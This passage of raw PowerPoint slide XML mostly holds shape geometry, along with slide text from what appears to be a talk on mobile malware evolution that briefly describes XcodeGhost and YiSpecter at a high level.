                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333" y="868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389" y="861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389" y="861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319" y="841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264" y="813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="201" y="542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291" y="216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381" y="278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589" y="376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="929" y="438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="929" y="438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="922" y="396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="922" y="362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="922" y="362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="929" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1033" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1033" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1158" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1387" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1463" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1532" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1657" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1719" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1775" y="139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1726" y="188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1671" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1671" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1893" y="167"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="6F5D2B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Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1787055" y="1259970"/>
            <a:ext cx="405982" cy="295992"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2002 w 2003"/>
              <a:gd name="T1" fmla="*/ 161 h 1458"/>
              <a:gd name="T2" fmla="*/ 1989 w 2003"/>
              <a:gd name="T3" fmla="*/ 245 h 1458"/>
              <a:gd name="T4" fmla="*/ 1944 w 2003"/>
              <a:gd name="T5" fmla="*/ 322 h 1458"/>
              <a:gd name="T6" fmla="*/ 1919 w 2003"/>
              <a:gd name="T7" fmla="*/ 355 h 1458"/>
              <a:gd name="T8" fmla="*/ 1848 w 2003"/>
              <a:gd name="T9" fmla="*/ 419 h 1458"/>
              <a:gd name="T10" fmla="*/ 1809 w 2003"/>
              <a:gd name="T11" fmla="*/ 445 h 1458"/>
              <a:gd name="T12" fmla="*/ 1288 w 2003"/>
              <a:gd name="T13" fmla="*/ 786 h 1458"/>
              <a:gd name="T14" fmla="*/ 1242 w 2003"/>
              <a:gd name="T15" fmla="*/ 818 h 1458"/>
              <a:gd name="T16" fmla="*/ 1178 w 2003"/>
              <a:gd name="T17" fmla="*/ 857 h 1458"/>
              <a:gd name="T18" fmla="*/ 1120 w 2003"/>
              <a:gd name="T19" fmla="*/ 889 h 1458"/>
              <a:gd name="T20" fmla="*/ 1056 w 2003"/>
              <a:gd name="T21" fmla="*/ 915 h 1458"/>
              <a:gd name="T22" fmla="*/ 1004 w 2003"/>
              <a:gd name="T23" fmla="*/ 928 h 1458"/>
              <a:gd name="T24" fmla="*/ 998 w 2003"/>
              <a:gd name="T25" fmla="*/ 928 h 1458"/>
              <a:gd name="T26" fmla="*/ 972 w 2003"/>
              <a:gd name="T27" fmla="*/ 922 h 1458"/>
              <a:gd name="T28" fmla="*/ 947 w 2003"/>
              <a:gd name="T29" fmla="*/ 915 h 1458"/>
              <a:gd name="T30" fmla="*/ 882 w 2003"/>
              <a:gd name="T31" fmla="*/ 889 h 1458"/>
              <a:gd name="T32" fmla="*/ 824 w 2003"/>
              <a:gd name="T33" fmla="*/ 857 h 1458"/>
              <a:gd name="T34" fmla="*/ 760 w 2003"/>
              <a:gd name="T35" fmla="*/ 818 h 1458"/>
              <a:gd name="T36" fmla="*/ 715 w 2003"/>
              <a:gd name="T37" fmla="*/ 786 h 1458"/>
              <a:gd name="T38" fmla="*/ 418 w 2003"/>
              <a:gd name="T39" fmla="*/ 593 h 1458"/>
              <a:gd name="T40" fmla="*/ 194 w 2003"/>
              <a:gd name="T41" fmla="*/ 445 h 1458"/>
              <a:gd name="T42" fmla="*/ 65 w 2003"/>
              <a:gd name="T43" fmla="*/ 329 h 1458"/>
              <a:gd name="T44" fmla="*/ 32 w 2003"/>
              <a:gd name="T45" fmla="*/ 290 h 1458"/>
              <a:gd name="T46" fmla="*/ 7 w 2003"/>
              <a:gd name="T47" fmla="*/ 219 h 1458"/>
              <a:gd name="T48" fmla="*/ 0 w 2003"/>
              <a:gd name="T49" fmla="*/ 187 h 1458"/>
              <a:gd name="T50" fmla="*/ 14 w 2003"/>
              <a:gd name="T51" fmla="*/ 109 h 1458"/>
              <a:gd name="T52" fmla="*/ 46 w 2003"/>
              <a:gd name="T53" fmla="*/ 52 h 1458"/>
              <a:gd name="T54" fmla="*/ 71 w 2003"/>
              <a:gd name="T55" fmla="*/ 25 h 1458"/>
              <a:gd name="T56" fmla="*/ 135 w 2003"/>
              <a:gd name="T57" fmla="*/ 0 h 1458"/>
              <a:gd name="T58" fmla="*/ 1822 w 2003"/>
              <a:gd name="T59" fmla="*/ 0 h 1458"/>
              <a:gd name="T60" fmla="*/ 1860 w 2003"/>
              <a:gd name="T61" fmla="*/ 0 h 1458"/>
              <a:gd name="T62" fmla="*/ 1919 w 2003"/>
              <a:gd name="T63" fmla="*/ 25 h 1458"/>
              <a:gd name="T64" fmla="*/ 1951 w 2003"/>
              <a:gd name="T65" fmla="*/ 45 h 1458"/>
              <a:gd name="T66" fmla="*/ 1989 w 2003"/>
              <a:gd name="T67" fmla="*/ 103 h 1458"/>
              <a:gd name="T68" fmla="*/ 2002 w 2003"/>
              <a:gd name="T69" fmla="*/ 161 h 1458"/>
              <a:gd name="T70" fmla="*/ 2002 w 2003"/>
              <a:gd name="T71" fmla="*/ 1290 h 1458"/>
              <a:gd name="T72" fmla="*/ 1996 w 2003"/>
              <a:gd name="T73" fmla="*/ 1322 h 1458"/>
              <a:gd name="T74" fmla="*/ 1970 w 2003"/>
              <a:gd name="T75" fmla="*/ 1380 h 1458"/>
              <a:gd name="T76" fmla="*/ 1951 w 2003"/>
              <a:gd name="T77" fmla="*/ 1406 h 1458"/>
              <a:gd name="T78" fmla="*/ 1892 w 2003"/>
              <a:gd name="T79" fmla="*/ 1444 h 1458"/>
              <a:gd name="T80" fmla="*/ 1822 w 2003"/>
              <a:gd name="T81" fmla="*/ 1457 h 1458"/>
              <a:gd name="T82" fmla="*/ 181 w 2003"/>
              <a:gd name="T83" fmla="*/ 1457 h 1458"/>
              <a:gd name="T84" fmla="*/ 110 w 2003"/>
              <a:gd name="T85" fmla="*/ 1444 h 1458"/>
              <a:gd name="T86" fmla="*/ 51 w 2003"/>
              <a:gd name="T87" fmla="*/ 1406 h 1458"/>
              <a:gd name="T88" fmla="*/ 32 w 2003"/>
              <a:gd name="T89" fmla="*/ 1380 h 1458"/>
              <a:gd name="T90" fmla="*/ 7 w 2003"/>
              <a:gd name="T91" fmla="*/ 1322 h 1458"/>
              <a:gd name="T92" fmla="*/ 0 w 2003"/>
              <a:gd name="T93" fmla="*/ 471 h 1458"/>
              <a:gd name="T94" fmla="*/ 51 w 2003"/>
              <a:gd name="T95" fmla="*/ 516 h 1458"/>
              <a:gd name="T96" fmla="*/ 116 w 2003"/>
              <a:gd name="T97" fmla="*/ 561 h 1458"/>
              <a:gd name="T98" fmla="*/ 669 w 2003"/>
              <a:gd name="T99" fmla="*/ 915 h 1458"/>
              <a:gd name="T100" fmla="*/ 772 w 2003"/>
              <a:gd name="T101" fmla="*/ 986 h 1458"/>
              <a:gd name="T102" fmla="*/ 818 w 2003"/>
              <a:gd name="T103" fmla="*/ 1006 h 1458"/>
              <a:gd name="T104" fmla="*/ 876 w 2003"/>
              <a:gd name="T105" fmla="*/ 1031 h 1458"/>
              <a:gd name="T106" fmla="*/ 998 w 2003"/>
              <a:gd name="T107" fmla="*/ 1057 h 1458"/>
              <a:gd name="T108" fmla="*/ 1004 w 2003"/>
              <a:gd name="T109" fmla="*/ 1057 h 1458"/>
              <a:gd name="T110" fmla="*/ 1062 w 2003"/>
              <a:gd name="T111" fmla="*/ 1051 h 1458"/>
              <a:gd name="T112" fmla="*/ 1127 w 2003"/>
              <a:gd name="T113" fmla="*/ 1031 h 1458"/>
              <a:gd name="T114" fmla="*/ 1230 w 2003"/>
              <a:gd name="T115" fmla="*/ 986 h 1458"/>
              <a:gd name="T116" fmla="*/ 1333 w 2003"/>
              <a:gd name="T117" fmla="*/ 915 h 1458"/>
              <a:gd name="T118" fmla="*/ 1564 w 2003"/>
              <a:gd name="T119" fmla="*/ 760 h 1458"/>
              <a:gd name="T120" fmla="*/ 1887 w 2003"/>
              <a:gd name="T121" fmla="*/ 561 h 1458"/>
              <a:gd name="T122" fmla="*/ 2002 w 2003"/>
              <a:gd name="T123" fmla="*/ 471 h 1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003" h="1458">
                <a:moveTo>
                  <a:pt x="2002" y="161"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2002" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1996" y="206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1970" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944" y="322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944" y="322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1887" y="387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1848" y="419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809" y="445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809" y="445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1288" y="786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1288" y="786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1242" y="818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1242" y="818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1178" y="857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1178" y="857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1056" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1056" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1030" y="922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004" y="928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972" y="922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="947" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="947" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="824" y="857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="824" y="857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760" y="818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760" y="818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715" y="786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715" y="786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418" y="593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418" y="593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1822" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1822" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1860" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1892" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1951" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1951" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1970" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1996" y="129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2002" y="161"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2002" y="471"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2002" y="1290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2002" y="1290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1996" y="1322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989" y="1355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1970" y="1380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1951" y="1406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1951" y="1406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="1432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1892" y="1444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1860" y="1451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1822" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142" y="1451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110" y="1444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="1432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="1406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="1406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="1380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451" y="773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="669" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="669" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="772" y="986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="772" y="986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="1006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="876" y="1031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="876" y="1031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="940" y="1051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="1057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="1057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004" y="1057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004" y="1057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1062" y="1051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127" y="1031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127" y="1031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1185" y="1006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1230" y="986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1230" y="986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1333" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1333" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1564" y="760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1887" y="561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1887" y="561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1951" y="516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2002" y="471"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="6F5D2B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946" y="2641753"/>
            <a:ext cx="480201" cy="48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8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45941"/>
            <a:ext cx="9144000" cy="3897559"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="25000">
                <a:schemeClr val="bg2">
                  <a:lumMod val="90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg2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Malware Evolution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smtClean="0"/>
              <a:t>Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Evolution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43" y="944141"/>
            <a:ext cx="5540135" cy="2988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350" y="1490388"/>
            <a:ext cx="5602147" cy="268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5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Mobile Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Evolution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Motivation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>What you do, where you go, what you say, 24/7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Challenges of mobile malware attackers:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Apple's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>App-Store and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Google Play</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>screening process</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Acquiring privileges requires unnatural end-user flows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57200" y="3304761"/>
            <a:ext cx="83931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dirty="0" smtClean="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:srgbClr val="004685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/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WHAT ATTACKERS ARE DOING?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" cap="none" dirty="0">
              <a:ln w="0"/>
              <a:solidFill>
                <a:srgbClr val="004685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17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Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>XcodeGhost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00150"/>
            <a:ext cx="4063878" cy="3096022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/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Compiler Malware:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>development </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Legitimate apps packed with malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Malware version enters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>AppStore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t> with developers’ credentials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1510"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714875" y="1104361"/>
            <a:ext cx="4133307" cy="284321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8083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a typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>YiSpecter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sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Jailbroken</a:t>
            </a:r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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r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/>
            </a:r>
            <a:b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</a:br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non</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
